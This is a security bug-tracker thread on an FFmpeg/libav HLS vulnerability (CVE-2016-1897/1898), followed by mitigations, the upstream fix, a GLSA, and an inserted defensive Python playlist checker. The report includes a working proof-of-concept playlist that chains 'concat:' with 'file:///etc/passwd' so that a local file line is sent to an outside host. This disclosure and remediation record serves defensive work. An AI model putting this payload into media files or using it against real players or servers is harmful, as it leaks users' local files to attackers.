From ${URL} :

Hello! I found some strange behavior in ffmpeg which can lead to stealing local files during ffmpeg/ffprobe exec; it also applies to libav. I've underestimated the impact of this bug, so it was fully disclosed in this article (Russian language, but Google Translate works fine with it): http://habrahabr.ru/company/mailru/blog/274855

In short: if a Linux user downloads a specially prepared video file (with any extension: avi/mov/etc.) which contains an HLS m3u8 playlist with the "concat" protocol in the URL:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://dx.su/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

header.m3u8:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://example.org?

If the user launches an ffmpeg-based video player (MPlayer, etc.), the first line of /etc/passwd will be sent to http://example.org? in the "http://example.org?# $FreeBSD: release/100.0/et.." request. The same happens when a file manager tries to generate a thumbnail for this file. All this also applies to server-run ffmpeg during video conversion.

The FFmpeg/libav security teams have already been notified, but official patches are not available yet, so you can rebuild ffmpeg with the --disable-network configure option, which prevents this vulnerability from being exploited. Moreover, it is always recommended to run ffmpeg in an isolated environment when processing untrusted files (googleonlinesecurity.blogspot.ru/2014/01/ffmpeg-and-thousand-fixes.html).

@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for stabilization or not.
CVE-2016-1898 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1898): FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read arbitrary files by using the subfile protocol in an HTTP Live Streaming (HLS) M3U8 file, leading to an external HTTP request in which the URL string contains an arbitrary line of a local file.

CVE-2016-1897 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1897): FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read arbitrary files by using the concat protocol in an HTTP Live Streaming (HLS) M3U8 file, leading to an external HTTP request in which the URL string contains the first line of a local file.
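The report above and the two CVE descriptions both come down to one thing: a playlist fetched from an untrusted source carried a segment URI that ffmpeg routed through a non-network protocol (concat, subfile, file). The following is an added example, not code from the report, ffmpeg or Gentoo: a small check that peels ffmpeg-style protocol prefixes off every URI line of an m3u8 playlist and rejects anything that is not a plain http(s) or relative reference, run over a playlist constructed from the one quoted in the report (the hostnames are placeholders).

```python
import re

# Constructed from the playlist quoted in the report above; hostnames are placeholders.
REPORTED_PLAYLIST = """#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://example.org/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST
"""

# A playlist from an untrusted source should only ever reference network resources.
ALLOWED_SCHEMES = {"http", "https"}

# An ffmpeg protocol prefix, optionally carrying ",opt,val,," options
# (the form the subfile protocol uses), terminated by ':'.
_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*)(?:,[^:]*)?:")


def protocol_chain(uri):
    """Peel nested protocol prefixes off a URI, e.g.
    'concat:http://h/x|file:///etc/passwd' -> ['concat', 'http', 'file']."""
    chain = []
    for part in uri.split("|"):  # '|' separates the inputs of the concat protocol
        while True:
            m = _SCHEME_RE.match(part)
            if not m:
                break
            chain.append(m.group(1).lower())
            part = part[m.end():]
    return chain


def check_playlist(text):
    """Return (line_no, uri, chain) for every URI line that is not a plain
    http(s) URL or a relative reference, i.e. anything that would be routed
    through another protocol such as concat, subfile or file."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        uri = raw.strip()
        if not uri or uri.startswith("#"):
            continue  # tags (#EXTINF, ...) and comments are not URIs
        chain = protocol_chain(uri)
        if "|" in uri or len(chain) > 1 or any(s not in ALLOWED_SCHEMES for s in chain):
            findings.append((no, uri, chain))
    return findings


if __name__ == "__main__":
    for no, uri, chain in check_playlist(REPORTED_PLAYLIST):
        print(f"line {no}: rejected {uri!r} (protocols: {' -> '.join(chain)})")
```

The same allowlist logic (network schemes only, no protocol chaining) is what the upstream fix enforces by leaving concat out of the HLS demuxer's permitted protocols.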
Upstream's resolution was to disable concat by default: https://git.libav.org/?p=libav.git;a=blob;f=Changelog;hb=refs/tags/v11.6#l7

We have disabled concat as well: https://gitweb.gentoo.org/repo/gentoo.git/tree/media-video/libav/libav-11.6.ebuild?id=699e5ef7bf5d2f62bff41d508796ae60403a8adb#n180
Added to an existing GLSA Request. Maintainer(s), please drop the vulnerable version(s).
This issue was resolved and addressed in GLSA 201705-08 at https://security.gentoo.org/glsa/201705-08 by GLSA coordinator Kristian Fiskerstrand (K_F).